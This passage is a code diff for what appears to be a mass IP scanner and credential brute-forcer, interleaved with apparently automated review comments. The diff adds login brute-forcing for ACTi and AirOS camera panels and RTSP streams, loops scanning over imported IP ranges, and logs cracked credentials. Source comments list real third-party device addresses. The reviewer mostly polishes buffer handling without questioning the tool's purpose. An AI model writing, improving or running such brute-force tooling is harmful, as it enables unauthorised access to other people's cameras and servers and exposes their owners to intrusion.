sprintf(request, "%s/login.cgi", ip); + char tempPostData[1024] = { 0 }; + int cl = 341 + strlen(login) + strlen(pass); + sprintf(tempPostData, "-----------------------------170381307613422\r\n\ +Content-Disposition: form-data; name=\"uri\"\r\n\ +\r\n\ +/\r\n\ +-----------------------------170381307613422\r\n\ +Content-Disposition: form-data; name=\"username\"\r\n\ +\r\n\ +%s\r\n\ +-----------------------------170381307613422\r\n\ +Content-Disposition: form-data; name=\"password\"\r\n\ +\r\n\ +%s\r\n\ +-----------------------------170381307613422--\ +\r\n", login, pass); + + sprintf(postData, "Content-Type: multipart/form-data; boundary=---------------------------170381307613422\r\n\ +Content-Length: %d\r\n\r\n\ +%s", cl, tempPostData); + } + + std::string buffer; + if (cookie->size() > 0) { + std::vector cookieHeader{ *cookie }; + Connector con; + if (doPost) res = con.nConnect(request, port, &buffer, postData, &cookieHeader); + else res = con.nConnect(request, port, &buffer, NULL, &cookieHeader); + } + else { + Connector con; + if (doPost) res = con.nConnect(request, port, &buffer, postData); + else res = con.nConnect(request, port, &buffer); } - - std::string buffer; - Connector con; - if (doPost) res = con.nConnect(request, port, &buffer, postData); - else res = con.nConnect(request, port, &buffer); if (res == -2) { if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL"); + nesca_3::addBARow(QString(ip), "--", "FAIL"); } else { stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); @@ -218,7 +265,7 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) strcpy(lps.pass, passLst[j]); if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), QString(login) + ":" + QString(pass), "OK"); + nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK"); } else { stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); 
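Review bot: `cookie->size()` is dereferenced without a null check in the new request block of IPCBrute, while the other optional pointer arguments of `nConnect` (`postData`, `customHeaders`, `lpString`) use NULL for "absent"; guard it with `if (cookie != NULL && cookie->size() > 0)`. The new ACTi and AirOS branches, like the existing ones, format `login` and `pass` with unbounded `sprintf`. In the AirOS branch the multipart body goes into `char tempPostData[1024]` and is then copied together with two header lines into `postData`, which IPCAuth.h declares as `char postData[1024]`, so both calls need `snprintf` with `sizeof` of the destination. IPCBrute's body starts and ends outside the hunk.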
@@ -227,10 +274,13 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) return lps; }; } + else { + return lps; + } if (BALogSwitched) { if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip) + ":" + QString::number(port), + rowIndex = nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); } @@ -245,7 +295,7 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) }; }; if (rowIndex == -1) { - nesca_3::addBARow(QString(ip) + ":" + QString::number(port), "--", "FAIL"); + nesca_3::addBARow(QString(ip), "--", "FAIL"); } else { stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); @@ -253,14 +303,14 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC) return lps; } -lopaStr IPC::IPCLobby(const char *ip, int port, char *SPEC) { +lopaStr IPC::IPCLobby(const char *ip, int port, char *SPEC, const std::string *cookie) { if(gMaxBrutingThreads > 0) { while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000); ++baCount; ++BrutingThrds; stt->doEmitionUpdateArc(gTargets); - lopaStr lps = IPCBrute(ip, port, SPEC); + lopaStr lps = IPCBrute(ip, port, SPEC, cookie); --BrutingThrds; return lps; diff --git a/IPCAuth.h b/IPCAuth.h index 5463b53..1179ce4 100644 --- a/IPCAuth.h +++ b/IPCAuth.h @@ -9,7 +9,7 @@ private: bool doPost; char postData[1024]; private: - lopaStr IPCBrute(const char *ip, int port, char *SPEC); + lopaStr IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie); public: IPC() { @@ -18,7 +18,7 @@ public: postData[0] = 0; } - lopaStr IPCLobby(const char *ip, int port, char *SPEC); + lopaStr IPCLobby(const char *ip, int port, char *SPEC, const std::string *cookie); }; #endif // IPCAUTH_H diff --git a/MainStarter.cpp b/MainStarter.cpp index eb4e4f1..8ba17ea 100644 --- a/MainStarter.cpp +++ b/MainStarter.cpp 
@@ -1347,27 +1347,30 @@ void MainStarter::startImportScan(){ break; } case false: { - ip1 = (ipsstartfl[gflIndex][0] * 16777216) + - (ipsstartfl[gflIndex][1] * 65536) + - (ipsstartfl[gflIndex][2] * 256) + - ipsstartfl[gflIndex][3]; - ip2 = (ipsendfl[gflIndex][0] * 16777216) + - (ipsendfl[gflIndex][1] * 65536) + - (ipsendfl[gflIndex][2] * 256) + - ipsendfl[gflIndex][3]; - struct in_addr tAddr; - for (unsigned long i = ip1; i <= ip2; ++i) { + for (gflIndex = 0; gflIndex < MainStarter::flCounter; gflIndex++) { + if (!globalScanFlag) break; + ip1 = (ipsstartfl[gflIndex][0] * 16777216) + + (ipsstartfl[gflIndex][1] * 65536) + + (ipsstartfl[gflIndex][2] * 256) + + ipsstartfl[gflIndex][3]; + ip2 = (ipsendfl[gflIndex][0] * 16777216) + + (ipsendfl[gflIndex][1] * 65536) + + (ipsendfl[gflIndex][2] * 256) + + ipsendfl[gflIndex][3]; + struct in_addr tAddr; + for (unsigned long i = ip1; i <= ip2; ++i) { - while (cons >= gThreads && globalScanFlag) Sleep(500); - if (!globalScanFlag) break; + while (cons >= gThreads && globalScanFlag) Sleep(500); + if (!globalScanFlag) break; - ++indexIP; + ++indexIP; - tAddr.s_addr = ntohl(i); - strcpy(currentIP, inet_ntoa(tAddr)); - verboseProgress(gTargets); - Threader::fireThread(currentIP, (void*(*)(void))_connect); - } + tAddr.s_addr = ntohl(i); + strcpy(currentIP, inet_ntoa(tAddr)); + verboseProgress(gTargets); + Threader::fireThread(currentIP, (void*(*)(void))_connect); + } + } break; }; } diff --git a/SSHAuth.cpp b/SSHAuth.cpp index b3d4bf1..123021e 100644 --- a/SSHAuth.cpp +++ b/SSHAuth.cpp @@ -91,7 +91,7 @@ int check_ssh_pass(const int rowIndex, const char *user, const char *pass, if(res == 0) { if (rowIndex == -1) { - nesca_3::addBARow(QString(host) + ":" + QString::number(port), QString(userPass) + "@" + QString(host), "OK"); + nesca_3::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK"); } else { stt->doEmitionChangeBARow(rowIndex, QString(userPass) + "@" + QString(host), "OK"); 
@@ -127,6 +127,8 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner return -1; } + ZeroMemory(login, 32); + ZeroMemory(pass, 32); strncpy(login, temp, ptr1 - temp); strcpy(pass, ptr1 + 1); diff --git a/STh.cpp b/STh.cpp index 32877b5..304a4a9 100644 --- a/STh.cpp +++ b/STh.cpp @@ -44,6 +44,10 @@ void STh::doEmitionGreenFoundData(QString str) { emit stt->changeGreenFoundData(str); } +void STh::doEmitionFoundDataCustom(QString str, QString color) +{ + emit stt->foundDataCustom(str, color); +} void STh::doEmitionYellowFoundData(QString str) { emit stt->changeYellowFoundData(str); diff --git a/STh.h b/STh.h index aed021a..c923abe 100644 --- a/STh.h +++ b/STh.h @@ -43,6 +43,7 @@ public: static void doEmitionRedFoundData(QString str); static void doEmitionGreenFoundData(QString); static void doEmitionYellowFoundData(QString); + static void doEmitionFoundDataCustom(QString, QString); static void doEmitionKillSttThread(); static void doEmitionDebugFoundData(QString); @@ -62,6 +63,7 @@ public: signals: void signalDataSaved(bool); public: signals: void changeFoundData(QString); public: signals: void changeRedFoundData(QString); public: signals: void changeGreenFoundData(QString); +public: signals: void foundDataCustom(QString, QString); public: signals: void changeYellowFoundData(QString); public: signals: void changeDebugFoundData(QString); public: signals: void killSttThread(); diff --git a/Utils.cpp b/Utils.cpp index fd4f885..002a07c 100644 --- a/Utils.cpp +++ b/Utils.cpp 
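Review bot: The new `ZeroMemory(login, 32);` and `ZeroMemory(pass, 32);` hard-code a size that the following `strncpy(login, temp, ptr1 - temp);` and `strcpy(pass, ptr1 + 1);` do not respect, so an entry longer than the buffers still overflows them. If `login` and `pass` are arrays (their declarations are outside the hunk), clear them with `sizeof(login)` and `sizeof(pass)` and bound the copies, e.g. `strncpy(pass, ptr1 + 1, sizeof(pass) - 1);`, rejecting entries whose login part is `>= sizeof(login)`. SSHBrute's body starts and ends outside the hunk.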
@@ -25,6 +25,24 @@ std::string Utils::startTime; //} +std::string Utils::getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName) { + if (buff->size() > 0) { + int headerSize = headerValue.size(); + int pos = buff->find(headerValue); + if (-1 != pos) { + int diff = pos + headerSize; + std::string fieldChunk = buff->substr(diff, buff->find("\r\n", pos) - diff); + std::string fieldHeader = outputName + fieldChunk.substr(0, fieldChunk.find(";")); + return fieldHeader; + } + else { + return ""; + } + } + else { + return ""; + } +} void Utils::saveStartDate() { QDate date = QDate::currentDate(); startDate = std::to_string(date.day()) diff --git a/Utils.h b/Utils.h index 99cef40..83235ce 100644 --- a/Utils.h +++ b/Utils.h @@ -92,6 +92,7 @@ public: static std::string getStartDate(); static std::string getStartTime(); static void emitScaryError(); + static std::string getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName); }; #endif // UTILS_H diff --git a/finder.cpp b/finder.cpp index 2c47387..d1ff65a 100644 --- a/finder.cpp +++ b/finder.cpp @@ -12,6 +12,7 @@ #include "IPCAuth.h" #include #include "HikvisionLogin.h" +#include "RTSP.h" unsigned char tl(unsigned char d) { @@ -237,10 +238,9 @@ bool isNegative(const std::string *buff, const char *ip, int port, const char *c if (gNegDebugMode) { QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251"); - stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + - "" + "]\tNegative hit: \"" + nCodec->toUnicode(negEntry.c_str()).toHtmlEscaped() - + "\""); + stt->doEmitionDebugFoundData("[" + QString(ip) + + "" + "]\tNegative hit: \"" + nCodec->toUnicode(negEntry.c_str()).toHtmlEscaped() + "\""); } ++filtered; 
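Review bot: getHeaderValue has no comment, and its parameters are easy to misread: `headerValue` is the text searched for in the response and `outputName` is a prefix put in front of the extracted value, which is cut at the first `;`. I would add `// Returns outputName + the text that follows headerValue on its line, up to the first ';'; returns "" when headerValue is absent.` above the definition. The search is case-sensitive, unlike getLocation in BasicAuth.cpp, which lowercases the buffer first, although header names are case-insensitive. Storing `find()` results in `int` and comparing with `-1` truncates `size_t`; `size_t` with `std::string::npos` is the idiomatic form, and the two `const std::string` parameters can be taken by const reference.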
@@ -256,8 +256,8 @@ bool isNegative(const std::string *buff, const char *ip, int port, const char *c if (gNegDebugMode) { QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251"); - stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + + stt->doEmitionDebugFoundData("[" + QString(ip) + "]\tNegative hit: Size:" + QString::number(nSz)); } return true; @@ -303,8 +303,8 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const { if (gNegDebugMode) { - stt->doEmitionDebugFoundData("Safari CCTV check failed - ignoring [" + QString(ip) + ":" + QString::number(port) + "]"); + stt->doEmitionDebugFoundData("Safari CCTV check failed - ignoring [" + QString(ip) + "]"); } return -1; } @@ -317,8 +317,8 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const { if (gNegDebugMode) { - stt->doEmitionDebugFoundData("Hikkvision iVMS check failed - ignoring [" + QString(ip) + ":" + QString::number(port) + "]"); + stt->doEmitionDebugFoundData("Hikkvision iVMS check failed - ignoring [" + QString(ip) + "]"); } return -1; } @@ -331,8 +331,8 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const { if (gNegDebugMode) { - stt->doEmitionDebugFoundData("RVI check failed - ignoring [" + QString(ip) + ":" + QString::number(port) + "]"); + stt->doEmitionDebugFoundData("RVI check failed - ignoring [" + QString(ip) + "]"); } return -1; } 
@@ -463,6 +463,9 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const && Utils::ustrstr(buffcpy, "login_chk_usr_pwd") != -1 ) return 57; //Network video client (http://203.190.113.54:60001/) if (Utils::ustrstr(buffcpy, "QlikView") != -1) return 58; //QLikView (http://203.96.113.183/qlikview/login.htm) + if (Utils::ustrstr(buffcpy, "RTSP/1.0") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam) + if (Utils::ustrstr(buffcpy, "ACTi Corporation") != -1) return 60; //ACTi (http://87.197.30.20/cgi-bin/videoconfiguration.cgi) + if (Utils::ustrstr(buffcpy, "airos_logo") != -1) return 61; //AirOS (http://103.5.73.114/login.cgi?uri=/) //if (Utils::ustrstr(buffcpy, "ShareCenter") != -1) return 58; //ShareCenter (http://49.50.207.6/) @@ -521,7 +524,7 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const int firstStage(const std::string *buffcpy, int port, const char *ip, const char *cp, int sz) { if (buffcpy->size() == 0 && sz != 0) { - stt->doEmitionYellowFoundData("Strange behavior: 0 bytes. " + QString(ip) + ":" + QString::number(port)); + stt->doEmitionYellowFoundData("Strange behavior: 0 bytes. " + QString(ip)); return -1; } int flag = sharedDetector(ip, port, buffcpy, cp); @@ -615,7 +618,7 @@ bool ftsSSH = true; bool ftsFTP = true; bool ftsBA = true; std::atomic fOpened(false); -void fputsf(char *text, int flag, char *msg) +void fputsf(char *text, int flag) { FILE *file = NULL; @@ -709,7 +712,7 @@ void fputsf(char *text, int flag, char *msg) char tmsg[1024] = {0}; ftsCameras = false; strcpy(tmsg, "" TYPE1 ""); - strcat(tmsg, msg); + //strcat(tmsg, msg); strcat(tmsg, HTTP_FILE_STYLE); fputs (tmsg, file); fputs(HTTP_FILE_HEADER, file); @@ -719,7 +722,7 @@ void fputsf(char *text, int flag, char *msg) char tmsg[1024] = {0}; ftsOther = false; strcpy(tmsg, "" TYPE2 ""); - strcat(tmsg, msg); + //strcat(tmsg, msg); strcat(tmsg, HTTP_FILE_STYLE); fputs (tmsg, file); fputs(HTTP_FILE_HEADER, file); 
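Review bot: The comments on the three signature checks added to sharedDetector record the addresses of specific third-party hosts where each pattern was seen. Source comments are published with the repository, so describe the vendor or firmware instead, or use a documentation-range placeholder (constructed example: `//RTSP (Hisilicon IP camera, e.g. http://192.0.2.10:554/)`). sharedDetector begins and ends outside this hunk.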
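Review bot: With the `msg` parameter removed from fputsf, the `//strcat(tmsg, msg);` line left in the `-709` hunk, and the same line in the `-719`, `-729`, `-739` and `-749` hunks, is dead code that refers to a name that no longer exists; delete it rather than commenting it out. If `text` is only read inside the function, the new signature could also be `void fputsf(const char *text, int flag)` so callers can pass `const` buffers without casts. Most of the function body lies outside these hunks.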
@@ -729,7 +732,7 @@ void fputsf(char *text, int flag, char *msg) char tmsg[1024] = {0}; ftsOther = false; strcpy(tmsg, "" TYPE5 ""); - strcat(tmsg, msg); + //strcat(tmsg, msg); strcat(tmsg, HTTP_FILE_STYLE); fputs (tmsg, file); fputs(HTTP_FILE_HEADER, file); @@ -739,7 +742,7 @@ void fputsf(char *text, int flag, char *msg) char tmsg[1024] = {0}; ftsFTP = false; strcpy(tmsg, "" TYPE4 ""); - strcat(tmsg, msg); + //strcat(tmsg, msg); strcat(tmsg, HTTP_FILE_STYLE); fputs (tmsg, file); fputs(HTTP_FILE_HEADER, file); @@ -749,7 +752,7 @@ void fputsf(char *text, int flag, char *msg) char tmsg[1024] = {0}; ftsBA = false; strcpy(tmsg, "" TYPE3 ""); - strcat(tmsg, msg); + //strcat(tmsg, msg); strcat(tmsg, HTTP_FILE_STYLE); fputs (tmsg, file); fputs(HTTP_FILE_HEADER, file); @@ -780,8 +783,8 @@ void putInFile(int flag, const char *ip, int port, int size, const char *finalst char log[4096] = {0}, msg[512] = {0}; QTextCodec *codec; - sprintf(msg, "%s:%d", - ip, port, ip, port); + sprintf(msg, "%s", + ip, ip); QString resMes(msg); QString strf; @@ -819,8 +822,8 @@ void putInFile(int flag, const char *ip, int port, int size, const char *finalst resMes.replace("[PK]", PEKO_PIC); stt->doEmitionFoundData(resMes.replace("[R]", REDIRECT_PIC)); - sprintf(log, "%s:%d; Received: %d", - ip, port, ip, port, size); + sprintf(log, "%s; Received: %d", + ip, ip, size); //Generic camera if(flag == 0 || flag == 15 || flag == -10) 
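Review bot: Both `sprintf` calls in putInFile (hunks `-780` and `-819`) write into fixed stack buffers, `msg[512]` and `log[4096]`, with no bound, and each expands `ip` twice. Other hunks in this commit drop the separate `:port` suffix and appear to let `ip` carry a URL derived from the response, so its length is no longer that of a bare address; use `snprintf(msg, sizeof(msg), …)` and `snprintf(log, sizeof(log), …)`. As rendered on this page the format strings show fewer conversions than there are arguments, presumably because markup inside the literals was stripped, so the argument list should be rechecked against the real format string now that `port` is gone. The function starts and ends outside these hunks.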
@@ -842,17 +845,60 @@ void putInFile(int flag, const char *ip, int port, int size, const char *finalst }; strcat(log, "\n"); - fputsf (log, flag, msg); + fputsf (log, flag); //ZeroMemory(msg, strlen(msg)); msg[0] = 0; } +//void _specFillerWF(const char *ip, int port, const char *finalstr, const char *login, const char *pass, int flag) +//{ +// char log[512] = { 0 }; +// +// ++PieBA; +// +// if (strlen(login) > 0 || strlen(pass) > 0) +// { +// sprintf(log, "[WF]:%s (%s:%s) T: %s\n", +// ip, ip, login, pass, finalstr); +// } +// +// stt->doEmitionFoundData(QString::fromLocal8Bit(log)); +// +// fputsf(log, flag); +//} +void _specFillerCustom(const char *ip, int port, const char *finalstr, const char *login, const char *pass, int flag, const char *classString) { + char log[512] = { 0 }; + + ++PieBA; + + if (strlen(login) > 0 || strlen(pass) > 0) + { + sprintf(log, "%s:%s (%s:%s) T: %s\n", + classString, ip, ip, login, pass, finalstr); + } + + stt->doEmitionFoundData(QString::fromLocal8Bit(log)); + + fputsf(log, flag); +} void _specFillerBA(const char *ip, int port, const char *finalstr, const char *login, const char *pass, int flag) { - char log[512] = {0}; + /* char log[512] = {0}; ++PieBA; + + if (strlen(login) > 0 || strlen(pass) > 0) + { + sprintf(log, "[BA]:%s:%s@%s T: %s\n", + login, pass, ip, login, pass, ip, finalstr); + } + + stt->doEmitionFoundData(QString::fromLocal8Bit(log)); + + fputsf(log, flag);*/ + + char log[512] = { 0 }; int offset = 0; if (strstri(ip, "https://") != NULL) { 
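Review bot: `_specFillerCustom` formats `classString`, `ip` (twice), `login`, `pass` and `finalstr` into `char log[512]` with plain `sprintf`; `finalstr` is whatever the caller passes, and parseFlag passes `header.c_str()`, presumably text taken from the remote response, so the combined length can exceed 512 and overrun the stack buffer. Use `snprintf(log, sizeof(log), …)` here; the same applies to the `sprintf` calls in `_specFillerBA` and `_specFillerRSTP` in the next hunk. When `login` and `pass` are both empty the function still emits and writes the empty `log`; an `else` branch like the one in `_specFillerRSTP`, or an early return, would make that case explicit. `port` is unused, and the two commented-out bodies (`_specFillerWF` and the old `_specFillerBA` prologue) are better deleted than kept.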
@@ -865,27 +911,48 @@ void _specFillerBA(const char *ip, int port, const char *finalstr, const char *l if (strlen(login) > 0 || strlen(pass) > 0) { if (8 == offset) { - sprintf(log, "[BA]:%s:%s@%s:%d T: %s\n", - login, pass, ip + offset, port, login, pass, ip + offset, port, finalstr); + sprintf(log, "[BA]:%s:%s@%s T: %s\n", + login, pass, ip + offset, login, pass, ip + offset, finalstr); } else { - sprintf(log, "[BA]:%s:%s@%s:%d T: %s\n", - login, pass, ip + offset, port, login, pass, ip + offset, port, finalstr); + sprintf(log, "[BA]:%s:%s@%s T: %s\n", + login, pass, ip + offset, login, pass, ip + offset, finalstr); } } else { if (8 == offset) { - sprintf(log, "[BA]:%s:%d T: %s\n", - ip + offset, port, ip + offset, port, finalstr); + sprintf(log, "[BA]:%s T: %s\n", + ip + offset, ip + offset, finalstr); } else { - sprintf(log, "[BA]:%s:%d T: %s\n", - ip + offset, port, ip + offset, port, finalstr); + sprintf(log, "[BA]:%s T: %s\n", + ip + offset, ip + offset, finalstr); } } stt->doEmitionFoundData(QString::fromLocal8Bit(log)); - fputsf (log , flag, "Basic Authorization"); + fputsf(log, flag); +} + +void _specFillerRSTP(const char *ip, int port, const char *finalstr, const char *login, const char *pass, int flag) +{ + char log[512] = { 0 }; + + ++PieBA; + + if (strlen(login) > 0 || strlen(pass) > 0) + { + sprintf(log, "[RSTP]:%s:%d (%s:%s) T: %s\n", + ip, port, login, pass, finalstr); + } + else { + sprintf(log, "[RSTP]:%s:%d T: %s\n", + ip, port, finalstr); + } + + stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "FF69B4"); + + fputsf(log, flag); } //void _specFillerWF(const char *ip, int port, char *finalstr, char *login, char *pass, int flag) 
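Review bot: After `port` is dropped, the two arms of each `if (8 == offset)` in `_specFillerBA` are identical as shown here (unless stripped markup hides a difference), so the test no longer selects anything and each pair can collapse to a single call. The new function and its output tag are spelled `RSTP` (`_specFillerRSTP`, `"[RSTP]:…"`) while the include and the lobby call use `RTSP` (`RTSP.h`, `RTSP::RTSPLobby`); settle on one spelling before the tag ends up in saved results. `_specFillerRSTP` also increments `PieBA`, which by its name counts Basic-Auth hits; confirm that is intended. `_specFillerBA` begins outside this hunk.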
@@ -1265,36 +1332,62 @@ void _specFillerBA(const char *ip, int port, const char *finalstr, const char *l // }; //} -void _specWEBIPCAMBrute(const char *ip, int port, char *finalstr, int flag, char *comment, char *cp, int size, char *SPEC) +void _specWEBIPCAMBrute(const char *ip, int port, char *finalstr, int flag, char *comment, char *cp, int size, char *SPEC, std::string *cookie) { IPC ipc; - lopaStr lps = ipc.IPCLobby(ip, port, SPEC); + lopaStr lps = ipc.IPCLobby(ip, port, SPEC, cookie); if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) { - _specFillerBA(ip, port, finalstr, lps.login, lps.pass, flag); + _specFillerCustom(ip, port, finalstr, lps.login, lps.pass, flag, "[WIC]"); - fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, comment, cp, "Basic Authorization"); + //fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, comment, cp, "Basic Authorization"); }; } int _specBrute(const char *ip, int port, const char *finalstr, int flag, - char *path, char *comment, char *cp, int size) + char *path, char *comment, char *cp, int size, bool performDoubleCheck = false, bool isBA = false) { - const lopaStr &lps = BA::BALobby((string(ip) + string(path)).c_str(), port); + const lopaStr &lps = BA::BALobby((string(ip) + string(path)).c_str(), port, performDoubleCheck); if (strcmp(lps.other, "404") == 0) { - stt->doEmitionRedFoundData("BA - 404 " + - QString(ip).mid(0, QString(ip).indexOf("/")) + ":" + QString::number(port) + QString(path) + ""); + stt->doEmitionRedFoundData("BA - 404 " + QString(ip) + QString(path) + ""); return -1; } if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) { - _specFillerBA(ip, port, finalstr, lps.login, lps.pass, flag); - fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "Basic Authorization"); + if (isBA) { + _specFillerBA(ip, port, finalstr, lps.login, lps.pass, flag); + } + else { + 
_specFillerCustom(ip, port, finalstr, lps.login, lps.pass, flag, "[WF]"); + } + return 0; + //fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "Basic Authorization"); + }; + + return 1; +} + +int _specRTSPBrute(const char *ip, int port, + const char *finalstr, int flag, + char *comment, char *cp, int size) +{ + const lopaStr &lps = RTSP::RTSPLobby(ip, port); + + if (strcmp(lps.other, "404") == 0) { + + stt->doEmitionFoundDataCustom("RSTP - 404 " + QString(ip) + "", "FF69B4"); + return -1; + } + + if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + { + _specFillerRSTP(ip, port, finalstr, lps.login, lps.pass, flag); + fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP"); }; } @@ -1434,7 +1527,7 @@ void _saveSSH(const char *ip, int port, int size, const char *buffcpy) ++PieSSH; - fputsf (log, -22, "SSH"); + fputsf (log, -22); char loginSSH[128] = {0}; char passSSH[128] = {0}; const char *ptrl1 = strstr(buffcpy, ":"); @@ -1448,12 +1541,12 @@ void _saveSSH(const char *ip, int port, int size, const char *buffcpy) } else { - stt->doEmitionRedFoundData("[_saveSSH] Wrong format! [" + QString(ip) + ":" + QString::number(port) + "]"); + stt->doEmitionRedFoundData("[_saveSSH] Wrong format! [" + QString(ip) + "]"); }; } else { - stt->doEmitionRedFoundData("[_saveSSH] Empty buffer! [" + QString(ip) + ":" + QString::number(port) + "]"); + stt->doEmitionRedFoundData("[_saveSSH] Empty buffer! [" + QString(ip) + "]"); }; } @@ -1924,8 +2017,7 @@ void _getLinkFromJSLocation(char *dataBuff, char *str, char *tag, char *ip, int } else { - stt->doEmitionRedFoundData("[JSLocator] Location extraction failed [" + QString(ip) + ":" + QString::number(port) + "]"); + stt->doEmitionRedFoundData("[JSLocator] Location extraction failed [" + QString(ip) + "]"); }; }; } 
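Review bot: `_specRTSPBrute` (hunk `-1265`) is declared `int` but returns a value only on the 404 path; after the credentials block control reaches the closing brace, and flowing off the end of a non-void function is undefined behaviour in C++. Mirror `_specBrute` from the same hunk: `return 0;` at the end of the success block and `return 1;` before the closing brace. Its `comment` parameter is never used in the body shown. The default arguments `performDoubleCheck = false, bool isBA = false` are on the definition of `_specBrute`, so any earlier declaration has to carry them instead.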
@@ -2372,167 +2464,176 @@ void _getLinkFromJSLocation(char *dataBuff, char *str, char *tag, char *ip, int static std::atomic hikkaStop(false); static std::atomic rviStop(false); std::string getTitle(const char *str, const int flag) { - const char *ptr1 = NULL, *secondStr = NULL; - char finalstr[512] = { 0 }; + if (59 == flag) { + std::string strHeader = std::string(str); + int strStart = strHeader.find("ver: "); + std::string strChunk = strHeader.substr(strStart + 5); + std::string headerFinal = strChunk.substr(0, strChunk.find("\r")); + return headerFinal; + } + else { + const char *ptr1 = NULL, *secondStr = NULL; + char finalstr[512] = { 0 }; - if (strstri(str, "realm") != NULL) - { - if ((ptr1 = strstr(str, "\"")) != NULL) + if (strstri(str, "realm") != NULL) { - int hm; - if (strstr((ptr1 + 1), "\"") != NULL) + if ((ptr1 = strstr(str, "\"")) != NULL) { - secondStr = strstr((ptr1 + 1), "\""); - hm = (int)(secondStr - ptr1); - } - else hm = 10; - strncat(finalstr, ptr1, (hm > 127 ? 20 : hm) + 1); - } - else { - strcat(finalstr, "Strange realm."); - } - strcat(finalstr, "::"); - }; - - if ((ptr1 = strstri(str, "")) != NULL) - { - if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, ""); - else - { - strcat(finalstr, "[Corrupted title]"); - return finalstr; - }; - int hm = (int)(secondStr - ptr1); - strncat(finalstr, ptr1 + 7, (hm > 256 ? 20 : hm) - 7); - - if (strstri(finalstr, "index of /") != NULL) - { - int hm = 0; - strcat(finalstr, " ("); - if (strstri(ptr1, "description") != NULL) ptr1 = strstri(ptr1, "description"); - if (strstri(ptr1, "") != NULL && strlen(finalstr) < 480) - { - if (iterCount++ > 6 || strlen(finalstr) > 300) break; - if (strstr(ptr1, "\">") != NULL) ptr1 = strstr(ptr1, "\">"); - else break; - secondStr = strstri(ptr1, ""); - - hm = (int)(secondStr - ptr1); - - strncat(finalstr, ptr1 + 2, (hm > 16 ? 
16 : hm) - 2); - strcat(finalstr, " "); - if (strstri(ptr1, "")) != NULL) { - char *ptr2 = strstri(ptr1, ""); - int sz = ptr2 - ptr1; - - strncat(finalstr, ptr1 + 4, (sz > 64 ? 64 : sz) - 4); - } - else if ((ptr1 = strstri(str, "")) != NULL) - { - if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, ""); - else - { - strcpy(finalstr, "[Corrupted title]"); - return finalstr; - }; - int hm = (int)(secondStr - ptr1); - strncat(finalstr, ptr1 + 18, (hm > 127 ? 30 : hm) - 18); - } - else if ((ptr1 = strstri(str, "")) != NULL) - { - if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, ""); - int hm = (int)(secondStr - ptr1); - strncat(finalstr, ptr1 + 20, (hm > 127 ? 30 : hm) - 20); - } - else if ((ptr1 = strstri(str, "") != NULL) - { - char *str3 = strstri(str2, ">"); - - int y = str3 - str2; - if (y > 256) + int hm; + if (strstr((ptr1 + 1), "\"") != NULL) { - strcpy(finalstr, "[Strange title]"); + secondStr = strstr((ptr1 + 1), "\""); + hm = (int)(secondStr - ptr1); } - else + else hm = 10; + strncat(finalstr, ptr1, (hm > 127 ? 20 : hm) + 1); + } + else { + strcat(finalstr, "Strange realm."); + } + strcat(finalstr, "::"); + }; + + if ((ptr1 = strstri(str, "")) != NULL) + { + if (strstri(ptr1, "") != NULL) secondStr = strstri(ptr1, ""); + else + { + strcat(finalstr, "[Corrupted title]"); + return finalstr; + }; + int hm = (int)(secondStr - ptr1); + strncat(finalstr, ptr1 + 7, (hm > 256 ? 20 : hm) - 7); + + if (strstri(finalstr, "index of /") != NULL) + { + int hm = 0; + strcat(finalstr, " ("); + if (strstri(ptr1, "description") != NULL) ptr1 = strstri(ptr1, "description"); + if (strstri(ptr1, "") != NULL && strlen(finalstr) < 480) { - strncat(finalstr, (char*)(str2 + strlen("title=")), y); - strcat(finalstr, "::"); + if (iterCount++ > 6 || strlen(finalstr) > 300) break; + if (strstr(ptr1, "\">") != NULL) ptr1 = strstr(ptr1, "\">"); + else break; + secondStr = strstri(ptr1, ""); + + hm = (int)(secondStr - ptr1); + + strncat(finalstr, ptr1 + 2, (hm > 16 ? 
